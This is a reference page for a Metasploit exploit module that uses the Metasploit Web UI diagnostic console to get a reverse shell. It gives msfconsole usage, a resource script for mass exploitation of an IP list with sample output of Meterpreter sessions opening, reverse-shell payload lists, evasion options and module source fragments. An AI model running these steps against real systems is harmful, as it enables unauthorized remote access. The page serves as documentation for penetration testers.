Metasploit Web UI Diagnostic Console Command Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/http/metasploit_webui_console_command_execution metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Metasploit Web UI Diagnostic Console Command Execution
Module: exploit/multi/http/metasploit_webui_console_command_execution
Source code: modules/exploits/multi/http/metasploit_webui_console_command_execution.rb
Disclosure date: 2016-08-23
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 3790, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits the "diagnostic console" feature in the Metasploit Web UI to obtain a reverse shell. The diagnostic console is able to be enabled or disabled by an administrator on Metasploit Pro and by an authenticated user on Metasploit Express and Metasploit Community. When enabled, the diagnostic console provides access to msfconsole via the web interface. An authenticated user can then use the console to execute shell commands. NOTE: Valid credentials are required for this module. Tested against: Metasploit Community 4.1.0, Metasploit Community 4.8.2, Metasploit Community 4.12.0

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using metasploit_webui_console_command_execution against a single host

Normally, you can use exploit/multi/http/metasploit_webui_console_command_execution this way:

msf > use exploit/multi/http/metasploit_webui_console_command_execution
msf exploit(metasploit_webui_console_command_execution) > show targets
    ... a list of targets ...
msf exploit(metasploit_webui_console_command_execution) > set TARGET target-id
msf exploit(metasploit_webui_console_command_execution) > show options
    ... show and set options ...
msf exploit(metasploit_webui_console_command_execution) > exploit

Using metasploit_webui_console_command_execution against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your metasploit_webui_console_command_execution will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/metasploit_webui_console_command_execution")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USERNAME: The user to authenticate as

  • PASSWORD: The password to authenticate with

Go back to menu.

Msfconsole Usage


Here is how the multi/http/metasploit_webui_console_command_execution exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/metasploit_webui_console_command_execution

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/metasploit_webui_console_command_execution) > show info

       Name: Metasploit Web UI Diagnostic Console Command Execution
     Module: exploit/multi/http/metasploit_webui_console_command_execution
   Platform: 
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-08-23

Provided by:
  Justin Steven

Available targets:
  Id  Name
  --  ----
  0   Unix
  1   Windows

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       The password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      3790             yes       (TCP)
  SSL        true             yes       Use SSL
  TARGETURI  /                yes       Metasploit Web UI base path
  USERNAME                    yes       The user to authenticate as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits the "diagnostic console" feature in the 
  Metasploit Web UI to obtain a reverse shell. The diagnostic console 
  is able to be enabled or disabled by an administrator on Metasploit 
  Pro and by an authenticated user on Metasploit Express and 
  Metasploit Community. When enabled, the diagnostic console provides 
  access to msfconsole via the web interface. An authenticated user 
  can then use the console to execute shell commands. NOTE: Valid 
  credentials are required for this module. Tested against: Metasploit 
  Community 4.1.0, Metasploit Community 4.8.2, Metasploit Community 
  4.12.0

Module Options


This is a complete list of options available in the multi/http/metasploit_webui_console_command_execution exploit:

msf6 exploit(multi/http/metasploit_webui_console_command_execution) > show options

Module options (exploit/multi/http/metasploit_webui_console_command_execution):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      3790             yes       (TCP)
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       Metasploit Web UI base path
   USERNAME                    yes       The user to authenticate as
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix

Advanced Options


Here is a complete list of advanced options supported by the multi/http/metasploit_webui_console_command_execution exploit:

msf6 exploit(multi/http/metasploit_webui_console_command_execution) > show advanced

Module advanced options (exploit/multi/http/metasploit_webui_console_command_execution):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/metasploit_webui_console_command_execution module can exploit:

msf6 exploit(multi/http/metasploit_webui_console_command_execution) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix
   1   Windows

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/metasploit_webui_console_command_execution exploit:

msf6 exploit(multi/http/metasploit_webui_console_command_execution) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
   3   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   9   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   10  payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   11  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   12  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   13  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   14  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   15  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   16  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   17  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   18  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   19  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   20  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   21  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   22  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   23  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   24  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   25  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   26  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   27  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   28  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   29  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   30  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   31  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   32  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   33  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   34  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   35  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   36  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   37  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   38  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   39  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   40  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   41  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   42  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   43  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   44  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   45  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   46  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   47  payload/generic/custom                                       normal  No     Custom Payload
   48  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   49  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/metasploit_webui_console_command_execution exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/metasploit_webui_console_command_execution) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Failed to retrieve login page


Here is a relevant code snippet related to the "Failed to retrieve login page" error message:

70:	      'method'    => 'GET',
71:	      'uri'       => normalize_uri(target_uri.path, 'login'),
72:	    })
73:	
74:	    unless res
75:	      fail_with(Failure::NotFound, 'Failed to retrieve login page')
76:	    end
77:	
78:	    unless res.headers.include?('Set-Cookie') && res.body =~ /name="authenticity_token"\W+.*\bvalue="([^"]*)"/
79:	      fail_with(Failure::UnexpectedReply, "Couldn't find cookies or authenticity_token. Is TARGETURI set correctly?")
80:	    end

Couldn't find cookies or authenticity_token. Is TARGETURI set correctly?


Here is a relevant code snippet related to the "Couldn't find cookies or authenticity_token. Is TARGETURI set correctly?" error message:

74:	    unless res
75:	      fail_with(Failure::NotFound, 'Failed to retrieve login page')
76:	    end
77:	
78:	    unless res.headers.include?('Set-Cookie') && res.body =~ /name="authenticity_token"\W+.*\bvalue="([^"]*)"/
79:	      fail_with(Failure::UnexpectedReply, "Couldn't find cookies or authenticity_token. Is TARGETURI set correctly?")
80:	    end
81:	
82:	    authenticity_token = $1
83:	    session = res.get_cookies
84:	

Failed to log in


Here is a relevant code snippet related to the "Failed to log in" error message:

97:	          'commit'                  => 'Sign in'
98:	        }
99:	    })
100:	
101:	    unless res
102:	      fail_with(Failure::NotFound, 'Failed to log in')
103:	    end
104:	
105:	    return res.get_cookies, authenticity_token
106:	
107:	  end

Failed to get diagnostic console status or profile_id


Here is a relevant code snippet related to the "Failed to get diagnostic console status or profile_id" error message:

115:	      'uri'       => normalize_uri(target_uri.path, 'settings'),
116:	      'cookie'    => session,
117:	    })
118:	
119:	    unless res
120:	      fail_with(Failure::NotFound, 'Failed to get diagnostic console status or profile_id')
121:	    end
122:	
123:	    unless res.body =~ /\bid="profile_id"\W+.*\bvalue="([^"]*)"/
124:	      fail_with(Failure::UnexpectedReply, 'Failed to get profile_id')
125:	    end

Failed to get profile_id


Here is a relevant code snippet related to the "Failed to get profile_id" error message:

119:	    unless res
120:	      fail_with(Failure::NotFound, 'Failed to get diagnostic console status or profile_id')
121:	    end
122:	
123:	    unless res.body =~ /\bid="profile_id"\W+.*\bvalue="([^"]*)"/
124:	      fail_with(Failure::UnexpectedReply, 'Failed to get profile_id')
125:	    end
126:	
127:	    profile_id = $1
128:	
129:	    if res.body =~ /<input\W+.*\b(id="allow_console_access"\W+.*\bchecked="checked"|checked="checked"\W+.*\bid="allow_console_access")/

Failed to get diagnostic console status


Here is a relevant code snippet related to the "Failed to get diagnostic console status" error message:

129:	    if res.body =~ /<input\W+.*\b(id="allow_console_access"\W+.*\bchecked="checked"|checked="checked"\W+.*\bid="allow_console_access")/
130:	      console_status = true
131:	    elsif res.body =~ /<input\W+.*\bid="allow_console_access"/
132:	      console_status = false
133:	    else
134:	      fail_with(Failure::UnexpectedReply, 'Failed to get diagnostic console status')
135:	    end
136:	
137:	    print_good("Console is currently: #{console_status ? 'Enabled' : 'Disabled'}")
138:	
139:	    return console_status, profile_id

Failed to set status of diagnostic console


Here is a relevant code snippet related to the "Failed to set status of diagnostic console" error message:

157:	          'commit'                  => 'Update Settings'
158:	        }
159:	    })
160:	
161:	    unless res
162:	      fail_with(Failure::NotFound, 'Failed to set status of diagnostic console')
163:	    end
164:	
165:	  end
166:	
167:	  def get_container_id(session, container_label)

Failed to get a valid <CONTAINER_LABEL_SINGULAR> ID


Here is a relevant code snippet related to the "Failed to get a valid <CONTAINER_LABEL_SINGULAR> ID" error message:

175:	      'uri'       => normalize_uri(target_uri.path, container_label),
176:	      'cookie'    => session,
177:	    })
178:	
179:	    unless res && res.body =~ /\bid="#{container_label_singular}_([^"]*)"/
180:	      print_warning("Failed to get a valid #{container_label_singular} ID")
181:	      return
182:	    end
183:	
184:	    container_id = $1
185:	

Failed to get a console ID


Here is a relevant code snippet related to the "Failed to get a console ID" error message:

198:	      'uri'       => normalize_uri(target_uri.path, container_label, container_id, 'console'),
199:	      'cookie'    => session,
200:	    })
201:	
202:	    unless res && res.headers['location']
203:	      fail_with(Failure::UnexpectedReply, 'Failed to get a console ID')
204:	    end
205:	
206:	    console_id = res.headers['location'].split('/')[-1]
207:	
208:	    vprint_good("Got console ID: #{console_id}")

Failed to get console authenticity_token


Here is a relevant code snippet related to the "Failed to get console authenticity_token" error message:

212:	      'uri'       => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),
213:	      'cookie'    => session,
214:	    })
215:	
216:	    unless res && res.body =~ /console_init\('console', 'console', '([^']*)'/
217:	      fail_with(Failure::UnexpectedReply, 'Failed to get console authenticity_token')
218:	    end
219:	
220:	    console_authenticity_token = $1
221:	
222:	    return console_id, console_authenticity_token

Failed to run command


Here is a relevant code snippet related to the "Failed to run command" error message:

240:	          '_'                       => ''
241:	        }
242:	    })
243:	
244:	    unless res
245:	      fail_with(Failure::NotFound, 'Failed to run command')
246:	    end
247:	
248:	  end
249:	
250:	  def exploit

Failed to get workspace ID or project ID. Cannot continue.


Here is a relevant code snippet related to the "Failed to get workspace ID or project ID. Cannot continue." error message:

262:	      container_label = "workspaces"
263:	    elsif container_id = get_container_id(session, "projects")
264:	      # target calls them "projects"
265:	      container_label = "projects"
266:	    else
267:	      fail_with(Failure::Unknown, 'Failed to get workspace ID or project ID. Cannot continue.')
268:	    end
269:	
270:	    console_id, console_authenticity_token = get_console(session, container_label,container_id)
271:	
272:	    run_command(session, container_label, console_authenticity_token,

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Justin Steven

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.